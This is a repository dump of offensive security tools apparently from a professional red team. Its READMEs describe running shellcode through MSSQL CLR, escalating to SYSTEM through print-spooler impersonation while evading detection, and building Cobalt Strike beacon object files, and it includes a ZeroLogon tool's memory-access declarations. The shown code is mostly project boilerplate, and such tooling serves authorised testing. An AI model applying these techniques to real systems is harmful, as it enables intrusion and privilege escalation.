├── Tools
├── bof-vs-template
│ ├── cna
│ │ ├── bin
│ │ │ └── README.md
│ │ └── hello.cna
│ ├── bof
│ │ ├── bof.c
│ │ ├── bof.vcxproj.filters
│ │ ├── beacon.h
│ │ └── bof.vcxproj
│ ├── README.md
│ ├── bof.sln
│ ├── .gitattributes
│ └── .gitignore
├── Squeak
│ ├── blacksquare.ico
│ ├── packages.config
│ ├── App.config
│ ├── Properties
│ │ ├── Settings.settings
│ │ ├── Settings.Designer.cs
│ │ ├── AssemblyInfo.cs
│ │ ├── Resources.Designer.cs
│ │ └── Resources.resx
│ ├── App.xaml
│ ├── App.xaml.cs
│ ├── MainWindow.xaml
│ ├── MainWindow.xaml.cs
│ ├── README.md
│ ├── Squeak.sln
│ ├── Code.xaml
│ ├── Code.xaml.cs
│ ├── Home.xaml
│ ├── clrcode.cs
│ ├── Squeak.csproj
│ ├── .gitignore
│ └── Home.xaml.cs
├── oab-parse
│ ├── mspack.x64.dll
│ ├── mspack.x86.dll
│ ├── requirements.txt
│ └── README.md
├── spoolsystem
│ ├── spoolsystem.gif
│ ├── cna
│ │ ├── bin
│ │ │ ├── SpoolTrigger.x64.dll
│ │ │ └── SpoolTrigger.x86.dll
│ │ └── spoolsystem.cna
│ ├── Readme.md
│ ├── SpoolTrigger.sln
│ ├── SpoolTrigger
│ │ ├── SpoolTrigger.vcxproj.filters
│ │ ├── patch.h
│ │ ├── ReflectiveDllInjection.h
│ │ ├── ms-rprn.idl
│ │ ├── dllmain.cpp
│ │ ├── ReflectiveLoader.h
│ │ └── ms-rprn_h.h
│ ├── .gitattributes
│ └── .gitignore
├── README.md
├── Sigwhatever
│ ├── FodyWeavers.xml
│ ├── App.config
│ ├── packages.config
│ ├── Sigwhatever.sln
│ ├── Properties
│ │ └── AssemblyInfo.cs
│ ├── Licences
│ │ ├── Seatbelt.txt
│ │ └── Inveigh.txt
│ ├── clsLDAP.cs
│ ├── .gitattributes
│ ├── HTTPCap.cs
│ ├── README.md
│ ├── Crypto.cs
│ ├── Sigwhatever.csproj
│ ├── FodyWeavers.xsd
│ ├── .gitignore
│ ├── clsOutlook.cs
│ └── NTLM.cs
├── SharpZeroLogon
│ ├── SharpZeroLogon
│ │ ├── Kernel32.cs
│ │ ├── Properties
│ │ │ └── AssemblyInfo.cs
│ │ ├── SharpZeroLogon.csproj
│ │ ├── Netapi32.cs
│ │ └── Program.cs
│ ├── SharpZeroLogon.sln
│ └── README.md
└── .gitignore
└── README.md
/Tools/bof-vs-template/cna/bin/README.md:
--------------------------------------------------------------------------------
1 | Here you will find the `bof.x86.o` and `bof.x64.o` files :)
2 |
--------------------------------------------------------------------------------
/Tools/Squeak/blacksquare.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/Squeak/blacksquare.ico
--------------------------------------------------------------------------------
/Tools/oab-parse/mspack.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/oab-parse/mspack.x64.dll
--------------------------------------------------------------------------------
/Tools/oab-parse/mspack.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/oab-parse/mspack.x86.dll
--------------------------------------------------------------------------------
/Tools/oab-parse/requirements.txt:
--------------------------------------------------------------------------------
1 | numpy == 1.22.0
2 | bitstream == 2.6.0.1
3 | click == 8.0.3
4 | tabulate == 0.8.9
--------------------------------------------------------------------------------
/Tools/spoolsystem/spoolsystem.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/spoolsystem.gif
--------------------------------------------------------------------------------
/Tools/README.md:
--------------------------------------------------------------------------------
1 | # Tools
2 |
3 | This repository contains tools that have been released publicly by the NCC Group FSAS team.
4 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/bin/SpoolTrigger.x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/cna/bin/SpoolTrigger.x64.dll
--------------------------------------------------------------------------------
/Tools/spoolsystem/cna/bin/SpoolTrigger.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nccgroup/nccfsas/HEAD/Tools/spoolsystem/cna/bin/SpoolTrigger.x86.dll
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Introduction
2 |
3 | This repository holds information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team.
4 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/Tools/Squeak/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.xaml:
--------------------------------------------------------------------------------
1 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/Tools/Squeak/App.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Configuration;
4 | using System.Data;
5 | using System.Linq;
6 | using System.Threading.Tasks;
7 | using System.Windows;
8 |
9 | namespace Squeak
10 | {
11 | ///
12 | /// Interaction logic for App.xaml
13 | ///
14 | public partial class App : Application
15 | {
16 | }
17 | }
18 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "beacon.h"
5 |
6 | void demo(char* args, int length) { // BOF entry point; hello.cna passes "demo" to beacon_inline_execute. args/length are the packed argument buffer built by bof_pack.
7 | datap parser;
8 | char* str_arg;
9 | int num_arg;
10 |
11 | BeaconDataParse(&parser, args, length); // set up the parser over the caller-supplied buffer
12 | str_arg = BeaconDataExtract(&parser, NULL); // first packed field ("z" in hello.cna); NULL means the size out-parameter is not requested
13 | num_arg = BeaconDataInt(&parser); // second packed field ("i" in hello.cna)
14 |
15 | BeaconPrintf(CALLBACK_OUTPUT, "Message is %s with %d arg", str_arg, num_arg); // NOTE(review): str_arg goes to %s unchecked; confirm in beacon.h whether BeaconDataExtract can return NULL for a short or mismatched buffer
16 | }
--------------------------------------------------------------------------------
/Tools/bof-vs-template/cna/hello.cna:
--------------------------------------------------------------------------------
1 | alias hello { # registers the "hello" console alias; $1 is the session the alias was typed in
2 | local('$barch $handle $data $args');
3 |
4 | # figure out the arch of this session
5 | $barch = barch($1);
6 |
7 | # read in the right BOF file
8 | $handle = openf(script_resource("bin/bof. $+ $barch $+ .o")); # NOTE(review): the handle is not checked, so a missing object file (project not built for this arch) is not reported here
9 | $data = readb($handle, -1);
10 | closef($handle);
11 |
12 | # pack our arguments
13 | $args = bof_pack($1, "zi", "Hello World", 1234); # "zi": one string then one integer, the order demo() in bof.c reads them
14 |
15 | # announce what we're doing
16 | btask($1, "Running Hello BOF");
17 |
18 | # execute it.
19 | beacon_inline_execute($1, $data, "demo", $args); # "demo" must match the function name in bof.c (see the template README)
20 | }
--------------------------------------------------------------------------------
/Tools/Squeak/MainWindow.xaml:
--------------------------------------------------------------------------------
1 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Tools/Squeak/MainWindow.xaml.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using System.Windows;
7 | using System.Windows.Controls;
8 | using System.Windows.Data;
9 | using System.Windows.Documents;
10 | using System.Windows.Input;
11 | using System.Windows.Media;
12 | using System.Windows.Media.Imaging;
13 | using System.Windows.Navigation;
14 | using System.Windows.Shapes;
15 |
16 | namespace Squeak
17 | {
18 | ///
19 | /// Interaction logic for MainWindow.xaml
20 | ///
21 | public partial class MainWindow : NavigationWindow
22 | {
23 | public MainWindow()
24 | {
25 | InitializeComponent();
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/Tools/Squeak/README.md:
--------------------------------------------------------------------------------
1 | # Squeak
2 |
3 | Connect to an MSSQL instance (as DBA/SA) and execute shellcode via a .net DLL.
4 |
5 | Generate a standalone .net executable with hard coded arguments to leverage SQL CLR integration.
6 |
7 | 1. Open the Squeak GUI
8 | 2. Populate the connection details and supply a raw shellcode file
9 | 3. Generate the executable and run it
10 |
11 | **Code for the CLR is taken from the clrcode.cs file which must reside in the working directory of the Squeak.exe binary**. Copy clrcode.cs to the working directory of Squeak.exe before running. Modifications to the code, for example to change the spawned binary, can be carried out within the Squeak GUI or by directly editing the clrcode.cs file. The file uses the string [RAW] as a placeholder for the shellcode.
12 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof/bof.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Tools/Squeak/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace Squeak.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.7.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/Tools/Squeak/Squeak.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30413.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Squeak", "Squeak.csproj", "{B36CA995-B475-427F-B209-4E7F0835023D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {B36CA995-B475-427F-B209-4E7F0835023D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {B36CA995-B475-427F-B209-4E7F0835023D}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {B36CA995-B475-427F-B209-4E7F0835023D}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {B36CA995-B475-427F-B209-4E7F0835023D}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {C3C8B6DE-7283-4C69-A858-FC0CAA4557B4}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Sigwhatever.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30413.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sigwhatever", "Sigwhatever.csproj", "{311F097D-17BF-418F-BEE7-BE15C1C93FF7}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {311F097D-17BF-418F-BEE7-BE15C1C93FF7}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {E031305F-6E82-4745-A3E6-32E3FDB65401}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Kernel32.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace SharpZeroLogon
5 | {
6 | internal class Kernel32 // P/Invoke declarations for kernel32.dll and psapi.dll. Together they cover loading a module, locating it, reading its memory and changing page protection; the callers (Program.cs) are not shown here.
7 | {
8 | [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Unicode)]
9 | internal static extern IntPtr LoadLibrary(string lpFileName); // returns the module handle, or IntPtr.Zero on failure
10 |
11 | [DllImport("kernel32.dll", SetLastError = true)]
12 | internal static extern bool VirtualProtect( // changes page protection on a region of the calling process
13 | IntPtr lpAddress,
14 | uint dwSize, // SIZE_T natively; declared as 32-bit here
15 | uint flNewProtect,
16 | out uint lpflOldProtect
17 | );
18 |
19 | [DllImport("kernel32.dll")] // NOTE(review): no SetLastError = true, so Marshal.GetLastWin32Error() is not reliable after a failed call
20 | internal static extern bool ReadProcessMemory(IntPtr hProcess, long lpBaseAddress, byte[] lpBuffer, uint dwSize, ref int lpNumberOfBytesRead); // NOTE(review): natively lpBaseAddress is pointer-sized and lpNumberOfBytesRead is SIZE_T*; long / ref int do not match on every bitness (IntPtr and out IntPtr would). Confirm the build is 64-bit only.
21 |
22 | internal struct MODULEINFO // managed mirror of the psapi MODULEINFO structure
23 | {
24 | internal IntPtr lpBaseOfDll;
25 | internal uint SizeOfImage;
26 | internal IntPtr EntryPoint;
27 | }
28 |
29 | [DllImport("psapi.dll", SetLastError = true)]
30 | internal static extern bool GetModuleInformation(IntPtr hProcess, IntPtr hModule, out MODULEINFO lpmodinfo, uint cb); // cb is the size in bytes of MODULEINFO
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpZeroLogon", "SharpZeroLogon\SharpZeroLogon.csproj", "{15CE9A3C-4609-4184-87B2-E29FC5E2B770}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {15CE9A3C-4609-4184-87B2-E29FC5E2B770}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {79F38300-555A-4869-B9B8-553F52CC9595}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/Readme.md:
--------------------------------------------------------------------------------
1 | # SpoolSystem
2 |
3 | SpoolSystem is a CNA script for Cobalt Strike which uses the Print Spooler named pipe impersonation trick to gain SYSTEM privileges.
4 |
5 | It uses internal Cobalt Strike APIs not usually exposed to aggressor scripting to achieve seamless execution as SYSTEM without creating any new process or relying on shellcode injection.
6 |
7 | ## Running
8 |
9 | The script supports two modes:
10 |
11 | * inject: this is the one you probably want to use. It triggers the spoolss RPC method via self-injection within the current process. This is the best option for OPSEC, but ideally should be done in a process you don't mind crashing (just in case).
12 | * spawn: this uses `bdllspawn` to trigger the spoolss RPC method, so launches another process (not as good for OPSEC)
13 |
14 | Both modes allow a user with only `SeImpersonatePrivilege` to gain SYSTEM privileges within the current beacon session. This is useful if you have a privilege escalation that gives you `LOCAL SERVICE`, `NETWORK SERVICE` or similar. However, it can also be used as a straight replacement for `getsystem`, and is much stealthier than the builtin CS method.
15 |
16 | ## Example
17 |
18 |
19 | 
20 |
21 | ## References
22 |
23 | * https://github.com/itm4n/PrintSpoofer
--------------------------------------------------------------------------------
/Tools/Squeak/Code.xaml:
--------------------------------------------------------------------------------
1 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | Code for CLR DLL - the [RAW] placeholder will be replaced with XORed shellcode
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/Tools/bof-vs-template/README.md:
--------------------------------------------------------------------------------
1 | # bof
2 |
3 | This is a template project for building Cobalt Strike BOFs in Visual Studio.
4 |
5 | If you prefer not to use the command line `cl.exe` or `mingw32` and are used to working with an IDE, this project should help with that.
6 |
7 | ## Using it
8 |
9 | Just clone this repo and you can start writing code in `bof.c`, using the APIs detailed in [this Cobalt Strike post.](https://www.cobaltstrike.com/help-beacon-object-files)
10 |
11 | If you change the default `demo` function name, then you will also need to change the entrypoint in the `cna\hello.cna` file.
12 |
13 | ## Building
14 |
15 | The project settings are set up to compile a `.lib` file without linking it. There is then a post-build job that copies the `.obj` files into the `cna\bin\` folder as `bof.x64.o` and `bof.x86.o` respectively.
16 |
17 | Once you have built the `.o` files, you just need to modify the `hello.cna` to pack your arguments correctly and modify the entrypoint and alias and you are all set!
18 |
19 | ## Testing it out
20 |
21 | If you just want to give BOFs a try, first build the project in release mode for both x86 and x64, then copy the `cna\` folder and load the `hello.cna` file in Cobalt Strike. In a beacon session type `hello`.
22 |
23 | This is the default example from the Cobalt Strike blog.
24 |
25 | You should see the following output printed if successful:
26 |
27 | ```
28 | [+] received output:
29 | Message is Hello World with 1234 arg
30 | ```
--------------------------------------------------------------------------------
/Tools/bof-vs-template/bof.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bof", "bof\bof.vcxproj", "{48E12421-9D4E-459F-8603-7D9E6A12CB39}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x64.ActiveCfg = Debug|x64
17 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x64.Build.0 = Debug|x64
18 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x86.ActiveCfg = Debug|Win32
19 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Debug|x86.Build.0 = Debug|Win32
20 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x64.ActiveCfg = Release|x64
21 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x64.Build.0 = Release|x64
22 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x86.ActiveCfg = Release|Win32
23 | {48E12421-9D4E-459F-8603-7D9E6A12CB39}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8874FEBC-DCD1-4750-B05F-90CCD5F0292E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29709.97
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpoolTrigger", "SpoolTrigger\SpoolTrigger.vcxproj", "{80A14EC7-7999-4828-8C48-13CDA7853E29}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x64.ActiveCfg = Debug|x64
17 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x64.Build.0 = Debug|x64
18 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x86.ActiveCfg = Debug|Win32
19 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Debug|x86.Build.0 = Debug|Win32
20 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x64.ActiveCfg = Release|x64
21 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x64.Build.0 = Release|x64
22 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x86.ActiveCfg = Release|Win32
23 | {80A14EC7-7999-4828-8C48-13CDA7853E29}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8623D52A-9314-4C3F-9B7D-538D9B813931}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Sigwhatever")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Sigwhatever")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("311f097d-17bf-418f-bee7-be15c1c93ff7")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Tools/SharpZeroLogon/SharpZeroLogon/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SharpZeroLogon")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpZeroLogon")]
13 | [assembly: AssemblyCopyright("Copyright © 2020")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("15ce9a3c-4609-4184-87b2-e29fc5e2b770")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Licences/Seatbelt.txt:
--------------------------------------------------------------------------------
1 | Rubeus is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2020, Will Schroeder and Lee Christensen
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/Licences/Inveigh.txt:
--------------------------------------------------------------------------------
1 | BSD 3-Clause License
2 |
3 | Copyright (c) 2020, Kevin Robertson
4 | All rights reserved.
5 |
6 | Redistribution and use in source and binary forms, with or without
7 | modification, are permitted provided that the following conditions are met:
8 |
9 | * Redistributions of source code must retain the above copyright notice, this
10 | list of conditions and the following disclaimer.
11 |
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 | this list of conditions and the following disclaimer in the documentation
14 | and/or other materials provided with the distribution.
15 |
16 | * Neither the name of the copyright holder nor the names of its
17 | contributors may be used to endorse or promote products derived from
18 | this software without specific prior written permission.
19 |
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
